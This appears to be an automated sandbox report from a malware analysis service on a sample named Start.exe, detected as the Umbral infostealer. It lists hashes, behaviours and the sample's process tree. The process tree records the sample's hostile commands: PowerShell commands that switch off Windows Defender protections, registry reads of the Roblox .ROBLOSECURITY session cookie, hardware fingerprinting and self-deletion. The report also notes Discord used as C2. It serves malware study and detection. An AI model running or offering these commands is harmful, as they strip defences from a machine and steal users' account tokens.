Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
7s -
max time network
5s -
platform
windows7_x64 -
resource
win7-20240611-en -
resource tags
arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system -
submitted
29/06/2024, 12:37
Behavioral task
behavioral1
Sample
Start.exe
Resource
win7-20240611-en
General
-
Target
Start.exe
-
Size
229KB
-
MD5
ad7985437149caea11bef60b8a5ef81a
-
SHA1
e098454f7c03a1ed404ee323d686c35839ac4def
-
SHA256
791d000badab89e84dac09066f475c877ad8ea07c5da080cc1ffbff77b3e886b
-
SHA512
22867a2fb56af5720b18ca01e1195eefee4cd0ced017e40a929b2587889392fbe99e68729aaefee736817afcf69ca49c411ed93b7edee736c12f32ee933f70e9
-
SSDEEP
6144:tloZM+rIkd8g+EtXHkv/iD48fQtxox8e1mNwi:voZtL+EP8Ugx6s
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral1/memory/2072-1-0x00000000011F0000-0x0000000001230000-memory.dmp family_umbral -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2188 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts Start.exe -
Deletes itself 1 IoCs
pid Process 2804 cmd.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 7 discord.com 8 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 4 ip-api.com -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1768 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1712 PING.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2072 Start.exe 2188 powershell.exe 2656 powershell.exe 2636 powershell.exe 1752 powershell.exe 1928 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2072 Start.exe Token: SeIncreaseQuotaPrivilege 2384 wmic.exe Token: SeSecurityPrivilege 2384 wmic.exe Token: SeTakeOwnershipPrivilege 2384 wmic.exe Token: SeLoadDriverPrivilege 2384 wmic.exe Token: SeSystemProfilePrivilege 2384 wmic.exe Token: SeSystemtimePrivilege 2384 wmic.exe Token: SeProfSingleProcessPrivilege 2384 wmic.exe Token: SeIncBasePriorityPrivilege 2384 wmic.exe Token: SeCreatePagefilePrivilege 2384 wmic.exe Token: SeBackupPrivilege 2384 wmic.exe Token: SeRestorePrivilege 2384 wmic.exe Token: SeShutdownPrivilege 2384 wmic.exe Token: SeDebugPrivilege 2384 wmic.exe Token: SeSystemEnvironmentPrivilege 2384 wmic.exe Token: SeRemoteShutdownPrivilege 2384 wmic.exe Token: SeUndockPrivilege 2384 wmic.exe Token: SeManageVolumePrivilege 2384 wmic.exe Token: 33 2384 wmic.exe Token: 34 2384 wmic.exe Token: 35 2384 wmic.exe Token: SeIncreaseQuotaPrivilege 2384 wmic.exe Token: SeSecurityPrivilege 2384 wmic.exe Token: SeTakeOwnershipPrivilege 2384 wmic.exe Token: SeLoadDriverPrivilege 2384 wmic.exe Token: SeSystemProfilePrivilege 2384 wmic.exe Token: SeSystemtimePrivilege 2384 wmic.exe Token: SeProfSingleProcessPrivilege 2384 wmic.exe Token: SeIncBasePriorityPrivilege 2384 wmic.exe Token: SeCreatePagefilePrivilege 2384 wmic.exe Token: SeBackupPrivilege 2384 wmic.exe Token: SeRestorePrivilege 2384 wmic.exe Token: SeShutdownPrivilege 2384 wmic.exe Token: SeDebugPrivilege 2384 wmic.exe Token: SeSystemEnvironmentPrivilege 2384 wmic.exe Token: SeRemoteShutdownPrivilege 2384 wmic.exe Token: SeUndockPrivilege 2384 wmic.exe Token: SeManageVolumePrivilege 2384 wmic.exe Token: 33 2384 wmic.exe Token: 34 2384 wmic.exe Token: 35 2384 wmic.exe Token: SeDebugPrivilege 2188 powershell.exe Token: SeDebugPrivilege 2656 powershell.exe Token: SeDebugPrivilege 2636 powershell.exe Token: SeDebugPrivilege 1752 powershell.exe Token: SeIncreaseQuotaPrivilege 1636 wmic.exe Token: SeSecurityPrivilege 1636 wmic.exe Token: SeTakeOwnershipPrivilege 1636 wmic.exe Token: SeLoadDriverPrivilege 1636 wmic.exe Token: SeSystemProfilePrivilege 1636 wmic.exe Token: SeSystemtimePrivilege 1636 wmic.exe Token: SeProfSingleProcessPrivilege 1636 wmic.exe Token: SeIncBasePriorityPrivilege 1636 wmic.exe Token: SeCreatePagefilePrivilege 1636 wmic.exe Token: SeBackupPrivilege 1636 wmic.exe Token: SeRestorePrivilege 1636 wmic.exe Token: SeShutdownPrivilege 1636 wmic.exe Token: SeDebugPrivilege 1636 wmic.exe Token: SeSystemEnvironmentPrivilege 1636 wmic.exe Token: SeRemoteShutdownPrivilege 1636 wmic.exe Token: SeUndockPrivilege 1636 wmic.exe Token: SeManageVolumePrivilege 1636 wmic.exe Token: 33 1636 wmic.exe Token: 34 1636 wmic.exe -
Suspicious use of WriteProcessMemory 39 IoCs
description pid Process procid_target PID 2072 wrote to memory of 2384 2072 Start.exe 28 PID 2072 wrote to memory of 2384 2072 Start.exe 28 PID 2072 wrote to memory of 2384 2072 Start.exe 28 PID 2072 wrote to memory of 3032 2072 Start.exe 31 PID 2072 wrote to memory of 3032 2072 Start.exe 31 PID 2072 wrote to memory of 3032 2072 Start.exe 31 PID 2072 wrote to memory of 2188 2072 Start.exe 33 PID 2072 wrote to memory of 2188 2072 Start.exe 33 PID 2072 wrote to memory of 2188 2072 Start.exe 33 PID 2072 wrote to memory of 2656 2072 Start.exe 35 PID 2072 wrote to memory of 2656 2072 Start.exe 35 PID 2072 wrote to memory of 2656 2072 Start.exe 35 PID 2072 wrote to memory of 2636 2072 Start.exe 37 PID 2072 wrote to memory of 2636 2072 Start.exe 37 PID 2072 wrote to memory of 2636 2072 Start.exe 37 PID 2072 wrote to memory of 1752 2072 Start.exe 39 PID 2072 wrote to memory of 1752 2072 Start.exe 39 PID 2072 wrote to memory of 1752 2072 Start.exe 39 PID 2072 wrote to memory of 1636 2072 Start.exe 41 PID 2072 wrote to memory of 1636 2072 Start.exe 41 PID 2072 wrote to memory of 1636 2072 Start.exe 41 PID 2072 wrote to memory of 780 2072 Start.exe 43 PID 2072 wrote to memory of 780 2072 Start.exe 43 PID 2072 wrote to memory of 780 2072 Start.exe 43 PID 2072 wrote to memory of 1660 2072 Start.exe 45 PID 2072 wrote to memory of 1660 2072 Start.exe 45 PID 2072 wrote to memory of 1660 2072 Start.exe 45 PID 2072 wrote to memory of 1928 2072 Start.exe 47 PID 2072 wrote to memory of 1928 2072 Start.exe 47 PID 2072 wrote to memory of 1928 2072 Start.exe 47 PID 2072 wrote to memory of 1768 2072 Start.exe 49 PID 2072 wrote to memory of 1768 2072 Start.exe 49 PID 2072 wrote to memory of 1768 2072 Start.exe 49 PID 2072 wrote to memory of 2804 2072 Start.exe 51 PID 2072 wrote to memory of 2804 2072 Start.exe 51 PID 2072 wrote to memory of 2804 2072 Start.exe 51 PID 2804 wrote to memory of 1712 2804 cmd.exe 53 PID 2804 wrote to memory of 1712 2804 cmd.exe 53 PID 2804 wrote to memory of 1712 2804 cmd.exe 53 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 3032 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Start.exe"C:\Users\Admin\AppData\Local\Temp\Start.exe"1⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2072 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2384
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Start.exe"2⤵
- Views/modifies file attributes
PID:3032
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Start.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2188
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2656
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2636
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1752
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1636
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵PID:780
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:1660
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1928
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:1768
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Start.exe" && pause2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:2804 -
C:\Windows\system32\PING.EXEping localhost3⤵
- Runs ping.exe
PID:1712
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD53c21ad34145125435128227c0aa5cb54
SHA17d515e0acfb066d25abd5d975b68ef01f69b00c8
SHA256f7161f4cfc6c94f981337520f9370fd78e5968863264ec08d232532110468487
SHA5122be7eb4f07696de6065ff840106b18ebe1f9607a9bc883604c2105e4fcc55f599e5f50e81aad085a4b1aabe4c5bf8609f72484cf1dfbaf6bd89e61bce4b16544